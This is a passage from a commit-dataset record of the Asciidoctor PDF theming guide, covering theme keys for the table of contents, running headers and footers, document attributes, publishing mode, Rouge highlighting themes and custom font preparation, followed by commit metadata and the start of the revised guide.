+\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text-decoration: none\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-h2-align)\n|toc:\n title:\n align: right\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-h2-font-color)\n|toc:\n title:\n font-color: #aa0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-h2-font-family)\n|toc:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $heading-h2-font-size)\n|toc:\n title:\n font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-h2-font-style)\n|toc:\n title:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-h2-text-transform)\n|sidebar:\n title:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc-dot-leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot-leader:\n content: \". \"\n\n|font-color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot-leader:\n font-color: #999999\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot-leader:\n font-style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot-leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font-style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\nPlease note that the running content will _not_ be used unless a) the periphery (header or footer) is configured and b) the height key for the periphery is assigned a value.\n\nCAUTION: If the height of the running content periphery is larger than the page margin, the running content will cover the main content.\nTo avoid this problem, reduce the height of the running content periphery or make the page margin on that side larger.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-running-content]*Key Prefix:* <<key-prefix-running-content,running-content>>\n\n|start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|running-content:\n start-at: toc\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|header:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|header:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|header:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|header:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|header:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical-align: center\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|footer:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|footer:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|footer:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|footer:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|footer:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical-align: top\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. *If the height is not set, the running content at this periphery is disabled.*\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: If you don't specify a height for either the header or footer key, it effectively disables the content at that periphery.\n\nIf you define running header and footer content in your theme (including the height), you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer-<side>-content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font settings (font-family, font-size, font-color, font-style, text-transform) that get applied to the running content in each column position for each page side (e.g., `footer-<side>-<position>-font-color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer-recto-right-font-color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+©+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line-height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header-recto-center-content\nfooter:\n height: 0.75in\n line-height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line-height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule are inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image-vertical-align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header-recto-center-content\n----\n<1> You can use the `footer-vertical-align` attribute to slighly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (i.e., `fit=contain`) to scale the image (up or down) to fit the available space.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-theme (or pdf-style):: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file and is resolved relative to `pdf-themesdir`, if specified, otherwise the current directory.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`) and is resolved relative to `pdf-themesdir`, if specified, otherwise the built-in themes dir.\n\npdf-themesdir (or pdf-stylesdir):: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\nIf `pdf-theme` ends with `.yml`, and `pdf-themesdir` is not specified, then `pdf-themesdir` defaults to the directory of the path specified by `pdf-theme`.\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-themesdir=resources\/themes -a pdf-theme=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-themesdir` attribute and just pass the absolute path of your theme file to the `pdf-theme` attribute.\n\n $ asciidoctor-pdf -a pdf-theme=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-themesdir=\/path\/to\/resources\/themes -a pdf-theme=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|outlinelevels\n|number (default: same as _toclevels_)\n|:outlinelevels: 2\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|page-background-image-(recto{vbar}verso)^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image-recto: image:bg-recto.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdf-version\n|1.3 {vbar} 1.4 {vbar} 1.5 {vbar} 1.6 {vbar} 1.7 (default: 1.4)\n|:pdf-version: 1.7\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-align^[7]^\n|<<text-alignments,Text alignment>>\n|:text-align: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf a background image isn't specified for a side, the converter will use the default page background image (`page-background-image`), if specified.\nTo disable the background for a side, use the value `none`.\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-align` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base-align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page-margin-inner` and `page-margin-outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin-inner: 0.75in\n margin-outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can result in the page numbering and the page facing to be out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - change the font weight to bold\n* `italic` - change the font style to italic\n* `underline` - add an underline to the text\n* `inline_block` - fill the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extend the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexidecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it use it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to active your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n\n[appendix]\n== Preparing a Custom Font\n\nAny TTF font can be used with Prawn--and hence Asciidoctor PDF--without modifications (unless, of course, it's corrupt or contains errors).\nHowever, you may discover that kerning is disabled and certain required glyphs are missing.\nTo address these problems, you need to prepare the font using a font program such as {url-fontforge}[FontForge].\n\n=== Validate the Font\n\nBefore using the font, you may want to check that the font is valid.\nTo do so, create the following script, which will verify that the TTF font is free from errors.\n\n.validate-font.rb\n[source,ruby]\n----\nrequire 'ttfunk'\nrequire 'ttfunk\/subset_collection'\n\nttf_subsets = TTFunk::SubsetCollection.new TTFunk::File.open ARGV[0]\n(0...(ttf_subsets.instance_variable_get :@subsets).size).each {|idx| ttf_subsets[idx].encode }\n----\n\nRun the script on your font as follows:\n\n $ ruby validate-font.rb path\/to\/font.ttf\n\nIf this script fails, the font will not work with Asciidoctor PDF.\nTo repair it, open the font in FontForge and resave it using menu:File[Generate Fonts...,Generate].\nDismiss any warning dialogs.\n\nResaving the font in FontForge will usually resolve any errors in the font.\n(If not, you may need to find another font, or at least another copy of it).\n\n=== Modifying the Font\n\nTo ready your font for use with Asciidoctor PDF, you'll need to modify it using a font program.\nWe recommend using {url-fontforge}[FontForge].\nBut don't let this scare you off.\nFontForge essentially works like a vector-drawing tool, in which each character is a separate canvas.\nYou can find a crash course in how to use the program on the FontForge project site.\n\nHere are the modifications you need to apply to a custom font for it to work best with Asciidoctor PDF:\n\n* Convert the font to TTF (only required if the font is not already a TTF, such as an OTF or TTC).\n* Add the glyphs for the required characters if missing from the font (optional if using a falback font).\n* Subset the font to exclude unused characters to reduce the file size (optional).\n* Save the file using the old-style kern table to activate kerning.\n\nNOTE: Technically, subsetting the font (i.e., removing glyphs) is not required since Prawn only embeds the characters from the font used in the document (i.e., it automatically subsets the font).\nHowever, if you plan to commit the font to a repository, subsetting helps keep the file size down.\n\nMost fonts do not provide glyphs for all the Unicode character ranges (i.e., scripts).\n(A glyph is the corresponding vector image for a Unicode character).\nIn fact, many fonts only include glyphs for Latin (Basic, Supplement, and Extended) and a few other scripts (e.g., Cyrillic, Greek).\nThat means certain glyphs Asciidoctor PDF relies on may be missing from the font.\n\nBelow are are the non-Latin characters that Asciidoctor PDF uses (for which glyphs are often missing):\nUnless you're using a fallback font that fills in the missing glyphs, you need to ensure these glyphs are present in your font (and add them if not).\n\n* \\u00a0 - no-break space\n* \\ufeff - zero width no-break space\n* \\u200b - zero width space (used for line break hints)\n* \\u000a - line feed character (zero width)\n* \\u2009 - thin spaced (used in the button UI element)\n* \\u202f - narrow no-break space (used in the keybinding UI element)\n* \\u2011 - non-breaking hyphen\n* \\u2022 - disc (used for first-level unordered list level)\n* \\u25e6 - circle (used for second-level unordered list level)\n* \\u25aa - square (used for third-level unordered list level)\n* \\u2611 - ballot box checked (used for checked list item)\n* \\u2610 - ballot box unchecked (used for unchecked list item)\n* \\u2014 - em-dash (used in quote attribute)\n* \\u203a - single right-pointing quotation mark (used in the menu UI element)\n* \\u25ba - right pointer (used for media play icon when icon fonts are disabled)\n\nIf you're preparing a font for use in verbatim blocks (e.g., a listing block), you'll also need this range of characters:\n\n* \\u2460 to \\u2468 - circled numbers\n\nOne way to get these glyphs is to steal them from another font (or from another character in the same font).\nTo do so, open the other font in FontForge, select the character, press kbd:[Ctrl,c], switch back to your font, select the character again, and press kbd:[Ctrl,v].\nYou may need to scale the glyph so it fits properly in the art box.\n\nIMPORTANT: If you're copying a non-visible character, be sure to set the width to 0 using menu:Metrics[Set Width...], enter 0 into *Set Width To*, then click btn:[OK].\n\nWhen you're done, save the font with the old-style kern table enabled.\nTo do so, select menu:File[Generate Fonts...], click btn:[Options], and make sure only the following options are selected (equivalent to the flags 0x90 + 0x08):\n\n* [x] OpenType\n ** [x] Old style 'kern'\n\nThen click btn:[Generate] to generate and save the font.\n\nYour font file is now ready to be used with Asciidoctor PDF.\n\n=== Scripting the Font Modifications\n\nPerforming all this font modification manually can be tedious (not to mention hard to reproduce).\nFortunately, FontForge provides a {url-fontforge-scripting}[scripting interface], which you can use to automate the process.\n\nIn fact, that's what we use to prepare the fonts that are bundled with Asciidoctor PDF.\nYou can find that FontForge script, the Bash script that calls it, and the Docker image in which it is run in the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/tree\/master\/scripts[scripts directory] of this project.\nYou can use that script as a starting point or reference for your own font preparation \/ modification script.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9cc648588b5891956a124c0b4e6e2dd289a0cd24","subject":"change example to show adding image to running header","message":"change example to show adding image to running header\n","repos":"hmflash\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\nInstead of separate properties for font weight and font style, the theme language combines these as the `font_style` property (allowing values \"normal\", \"bold\", \"italic\" and \"bold_italic\").\n\nThe `text_align` property from CSS is the `align` property in the theme language.\n\nThe `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme (PENDING, see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/132[#132]).\nThe converter uses the information from the theme map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 